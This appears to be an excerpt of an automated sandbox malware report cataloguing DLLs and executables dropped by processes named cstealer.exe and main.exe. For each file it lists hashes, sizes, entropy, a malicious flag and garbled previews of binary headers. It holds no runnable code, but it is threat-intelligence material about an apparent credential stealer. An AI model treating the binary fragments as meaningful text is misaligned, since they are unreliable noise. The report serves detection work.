                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32454900
                                                                                                                                                          Entropy (8bit):7.999519647449114
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:786432:BvIFRVH8nRHay5SgGG4H55ABnWgSGiCzJjlknEs:BvEr+R6oGrHoBn02js
                                                                                                                                                          MD5:A1DDA0E77B597A95DC0D894A4D28780A
                                                                                                                                                          SHA1:20FEFD14AC0DBAB9809975F23A3F389FFF4CE043
                                                                                                                                                          SHA-256:3D8C76600AF69B316FB85D9834177B30070585B435D034516170F974FFB500B3
                                                                                                                                                          SHA-512:B46ACC9D48A1A2A0F914FCDD37ADDD829E3EEFC1E2035D22B418484D0025BDCEE27613415F08E8EA0B953D164D883146CD24E220D3741162A3B5605DD7A99400
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48000
                                                                                                                                                          Entropy (8bit):7.804339649997861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ZwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:OAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
                                                                                                                                                          MD5:0C13627F114F346604B0E8CBC03BAF29
                                                                                                                                                          SHA1:BF77611D924DF2C80AABCC3F70520D78408587A2
                                                                                                                                                          SHA-256:DF1E666B55AAE6EDE59EF672D173BD0D64EF3E824A64918E081082B8626A5861
                                                                                                                                                          SHA-512:C97FA0F0988581EAE5194BD6111C1D9C0E5B1411BAB47DF5AA7C39AAD69BFBECA383514D6AAA45439BB46EACF6552D7B7ED08876B5E6864C8507EAA0A72D4334
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!............Pd....................................................`.............................................H.................... .. ..................................................Pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):107384
                                                                                                                                                          Entropy (8bit):7.936833941258681
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:YzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:PU/gbHfW6WSWLplCuG
                                                                                                                                                          MD5:7BA541DEFE3739A888BE466C999C9787
                                                                                                                                                          SHA1:AD0A4DF9523EEEAFC1E67B0E4E3D7A6CF9C4DFAC
                                                                                                                                                          SHA-256:F90EFA10D90D940CDE48AAFE02C13A0FC0A1F0BE7F3714856B7A1435F5DECF29
                                                                                                                                                          SHA-512:9194A527A17A505D049161935432FA25BA154E1AEE6306DEE9054071F249C891F0CA7839DE3A21D09B57FDC3F29EE7C4F08237B0DFFFAFA8F0078CFE464BED3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):34688
                                                                                                                                                          Entropy (8bit):7.676872991541861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:UA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:UwnzKUQ+p6mcTID5Iub7SyiPx
                                                                                                                                                          MD5:596DF8ADA4B8BC4AE2C2E5BBB41A6C2E
                                                                                                                                                          SHA1:E814C2E2E874961A18D420C49D34B03C2B87D068
                                                                                                                                                          SHA-256:54348CFBF95FD818D74014C16343D9134282D2CF238329EEC2CDA1E2591565EC
                                                                                                                                                          SHA-512:E16AAD5230E4AF7437B19C3DB373B1A0A0A84576B608B34430CCED04FFC652C6FB5D8A1FE1D49AC623D8AE94C8735800C6B0A12C531DCDD012B05B5FD61DFF2E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86400
                                                                                                                                                          Entropy (8bit):7.925569108441777
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:nomFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:IO4KV0qKTYhFlupdQ8WLvIDe1Yehx
                                                                                                                                                          MD5:8D9E1BB65A192C8446155A723C23D4C5
                                                                                                                                                          SHA1:EA02B1BF175B7EF89BA092720B3DAA0C11BEF0F0
                                                                                                                                                          SHA-256:1549FE64B710818950AA9BF45D43FE278CE59F3B87B3497D2106FF793EFA6CF7
                                                                                                                                                          SHA-512:4D67306FE8334F772FE9D463CB4F874A8B56D1A4AD3825CFF53CAE4E22FA3E1ADBA982F4EA24785312B73D84A52D224DFB4577C1132613AA3AE050A990E4ABDF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42872
                                                                                                                                                          Entropy (8bit):7.71252337640455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:eQ8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:eTieXEhow072IDQwzFD7Sy+Px3sxi
                                                                                                                                                          MD5:4351D7086E5221398B5B78906F4E84AC
                                                                                                                                                          SHA1:BA515A14EC1B076A6A3EAB900DF57F4F37BE104D
                                                                                                                                                          SHA-256:A0FA25EEF91825797F01754B7D7CF5106E355CF21322E926632F90AF01280ABE
                                                                                                                                                          SHA-512:A1BCF51E797CCAE58A0B4CFE83546E5E11F8FC011CA3568578C42E20BD7A367A5E1FA4237FB57AA84936EEC635337E457A61A2A4D6ECA3E90E6DDE18AE808025
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

Process:C:\Users\user\AppData\Local\Temp\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1189728
Entropy (8bit):7.945107908450931
Encrypted:false
SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
MD5:DAA2EED9DCEAFAEF826557FF8A754204
SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1701240
Entropy (8bit):7.993696827956843
Encrypted:true
SSDEEP:49152:A0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:vziPwCvZalhXOMIzQd
MD5:BB46B85029B543B70276AD8E4C238799
SHA1:123BDCD9EEBCAC1EC0FD2764A37E5E5476BB0C1C
SHA-256:72C24E1DB1BA4DF791720A93CA9502D77C3738EEBF8B9092A5D82AA8D80121D0
SHA-512:5E993617509C1CF434938D6A467EB0494E04580AD242535A04937F7C174D429DA70A6E71792FC3DE69E103FFC5D9DE51D29001A4DF528CFFFEFDAA2CEF4EAF31
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):24960
Entropy (8bit):7.407412042104121
Encrypted:false
SSDEEP:384:5oJUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:eJjW1J2pJjNID7GuIYiSyvCPxWEC
MD5:ABF7864DB4445BBBD491C8CFF0410AE0
SHA1:4B0F3C5C7BF06C81A2C2C5693D37EF49F642A9B7
SHA-256:DDEADE367BC15EA09D42B2733D88F092DA5E880362EABE98D574BC91E03DE30E
SHA-512:8F55084EE137416E9D61FE7DE19E4CFF25A4B752494E9B1D6F14089448EF93E15CD820F9457C6CE9268781BD08E3DF41C5284801F03742BC5C40B3B81FB798C5
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):300920
Entropy (8bit):7.985723274612961
Encrypted:false
SSDEEP:6144:Z2Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:Z2/e6inLOoyVJ/LHQdgipxsMY
MD5:BB3FCA6F17C9510B6FB42101FE802E3C
SHA1:CB576F3DBB95DC5420D740FD6D7109EF2DA8A99D
SHA-256:5E2F1BBFE3743A81B00717011094798929A764F64037BEDB7EA3D2ED6548EB87
SHA-512:05171C867A5D373D4F6420136B6AC29FA846A85B30085F9D7FABCBB4D902AFEE00716DD52010ED90E97C18E6CB4E915F13F31A15B2D8507E3A6CFA80E513B6A2
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):98736
Entropy (8bit):6.474996871326343
Encrypted:false
SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:F12681A472B9DD04A812E16096514974
SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):83328
Entropy (8bit):6.532254531979707
Encrypted:false
SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
MD5:4101128E19134A4733028CFAAFC2F3BB
SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):123768
Entropy (8bit):6.017133084000375
Encrypted:false
SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
MD5:6A9CA97C039D9BBB7ABF40B53C851198
